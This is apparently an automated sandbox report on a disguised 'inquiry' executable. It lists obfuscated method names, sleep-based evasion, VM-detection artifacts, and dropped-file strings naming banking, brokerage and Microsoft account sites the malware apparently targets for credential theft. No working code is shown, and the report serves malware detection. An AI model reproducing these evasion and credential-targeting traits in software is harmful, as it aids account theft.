                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, PoZbtMzHuOKInXqKNJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HblILOvFy1', 'uRSIgD6eIG', 'RYXIs2X8QJ', 'lSnIVoPMN0', 'Lg1IXdc3XF', 'gaZIITkUOG', 'Aa4Ik6thwN'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, qno1tymxYbO2r3sJNf.csHigh entropy of concatenated method names: 'HS8LrtgJNV', 'dnsLA39Vdq', 't8aLOHQLfZ', 'K7ALvbvPjm', 'PvJLPIkDOC', 'moRLSf2eNh', 'zHrL2bZIBs', 'CMRLbKYVYk', 'ky5LTKG0us', 'FWSLEDC2wG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, rTa5imCWqdkmB6wjPk.csHigh entropy of concatenated method names: 'pbj3Y4Sq2i', 'Q5t3cC7Ntq', 'ep63rE5Yk8', 'ovb3AS1Erb', 'euU3gWVxpA', 'soG3sJpyt6', 'RyP3VcoUZF', 'COO3XsoKpj', 'g2l3I6731k', 'S2Q3kJCMIs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, iX3jYo5b7XNiZZXSAR.csHigh entropy of concatenated method names: 'JRmxojFg2Z', 'WF7x3AMxmj', 'BqvxqWvwGm', 'ETHq4JC62d', 'c8Lqzp4Gg6', 'ColxDZlXGX', 'i68xFeZgwa', 'I5KxRFjvlB', 'Nidxm7oRcb', 'gYkxQnvlBs'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, unTi9rbmXOPJ0aSMYW.csHigh entropy of concatenated method names: 'PnTmfTxi37', 'cWvmoYGZrC', 'qu2mCk9yuL', 'QJGm3wqqEd', 'Pfmmuq6Pb3', 'mcemqimGkC', 'RLMmxKeMCp', 'myRmjTT7HL', 'uiHmUpAkdm', 'LFomn0gM2O'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, PdEGCJtnrBHUYbRdcG.csHigh entropy of concatenated method names: 'k3kIFsSjLx', 'Y0UImelAPw', 'bkSIQh99L0', 'VwlIo12Z4G', 't1YICY966D', 'sEpIurSxM1', 'P0gIqAiuPN', 'pHEXZJbbRt', 'mfDXMFI8JM', 'gr2Xy1r4pA'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, Yrda3ChKFSZWpRxAwg.csHigh entropy of concatenated method names: 'Dispose', 'BLWFy2PWaL', 'zIPRvQctg9', 'CtuddYFjoj', 'ilLF4oe9nM', 'DaDFzs29Uy', 'ProcessDialogKey', 'X4gRDx8Li6', 'uHsRFhIsr6', 'wS7RR43JaG'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, Ivt4puv4yAdMYHAvAY.csHigh entropy of concatenated method names: 'xqN8lP4Tf', 'HgMYaoHtB', 'klUcpZY8r', 'HRgKrb5jt', 'cQiAk0ATO', 'oEmWXqTQq', 'TSDIiwdgxKQd3Sai2p', 'ByTR1snVkJiK2hFDAw', 'fPqXXpKLV', 'uHJkPVNVH'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, FaFgKZZc7bmGVoispx.csHigh entropy of concatenated method names: 'bhlx7tgUob', 'z8Vxakd8lk', 'glQx8WO9AT', 'Pt0xYQqyEA', 'hbBx1tycVy', 'j1qxcvyitb', 'YZ8xKH2jDf', 'mobxr5pD6D', 'A4sxAvq28c', 'pbRxW8iCwp'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, QIxXUl9ykF6i6XwVuL.csHigh entropy of concatenated method names: 'jqLCedqrih', 'ibmCNJKuYu', 'YX2CpuSLT3', 'rhVCH1Ohp2', 'gpeCiKVIH2', 'G5XCJgfYAI', 'hLYCZ35mu6', 'iAXCMHkOt7', 'PW3CyIYgr9', 'OuuC4HE2e9'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, o4iFd1ygcCAYmOMS3r.csHigh entropy of concatenated method names: 'mbcXo5M08d', 'JW7XCdES4B', 'OlJX3q2Sq6', 'uoVXuEPyfB', 'GscXq4igWE', 'q9LXx3QQ9g', 'BVRXjltAa6', 'slAXUmGgwc', 'wuRXn4lDdt', 'lXhXtb7iWE'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, T1khdSprDUSyNMMGSX.csHigh entropy of concatenated method names: 'tXUFxsmw3H', 'S1xFjZkZmt', 'U36Fnpe9Ls', 'HXYFtJN2bk', 'lTZFgD5DoU', 'G78Fs3AWSE', 'bVyGHGcCqeKaSYos2B', 'Hsy9ZhgmNdOsrEb0E4', 'gGuFFWjcjm', 'pipFmxHU1K'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, tk95CgwBg05oKY2LBo.csHigh entropy of concatenated method names: 'ToString', 'iMAsEuxFJN', 'chDsvV26wA', 'DC2slRm4tg', 'cK4sPevSS6', 'jDlsSOiLXX', 'hNss0pa22v', 'bgJs2JtahX', 'QWEsbaZ4nh', 'GKjshyhNIK'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, nHy93WWjIw9E7ltEHb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wsLRyFOsvg', 'RfwR4hYcJq', 'LcVRzJPL0V', 'CcqmDiRaII', 'LQlmFyZkOu', 'MY2mRIFwho', 'JqMmmWGFON', 'l1qWX27MkCXHZRVp7KZ'
                Source: 0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4e2cc50.4.raw.unpack, e4YOeKc1sS6G73rwxfw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'k0WkefeNxS', 'edvkNsse8p', 'gFJkpQ238o', 'TkJkHkwQ1T', 'MSSkivIK7A', 'CEkkJWiWoW', 'YrJkZdlnVx'
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: 18B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: 5210000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: 91D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: B1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: B890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: C890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeMemory allocated: D890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1096E rdtsc 4_2_00F1096E
                Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 9842Jump to behavior
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696Thread sleep count: 130 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696Thread sleep time: -260000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696Thread sleep count: 9842 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exe TID: 7696Thread sleep time: -19684000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792Thread sleep time: -41000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe TID: 7792Thread sleep time: -49500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294BC00 FindFirstFileW,FindNextFileW,FindClose,21_2_0294BC00
                Source: Amcache.hve.7.drBinary or memory string: VMware
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: C3vB7APK.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: C3vB7APK.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: C3vB7APK.21.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: C3vB7APK.21.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: C3vB7APK.21.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: C3vB7APK.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: C3vB7APK.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: C3vB7APK.21.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: C3vB7APK.21.drBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: C3vB7APK.21.drBinary or memory string: global block list test formVMware20,11696492231
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3682182955.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: C3vB7APK.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: C3vB7APK.21.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: C3vB7APK.21.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: C3vB7APK.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: C3vB7APK.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: C3vB7APK.21.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: C3vB7APK.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                Source: C3vB7APK.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: C3vB7APK.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: C3vB7APK.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: C3vB7APK.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: C3vB7APK.21.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: C3vB7APK.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: C3vB7APK.21.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: C3vB7APK.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: firefox.exe, 00000018.00000002.1778377765.000002491E30C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
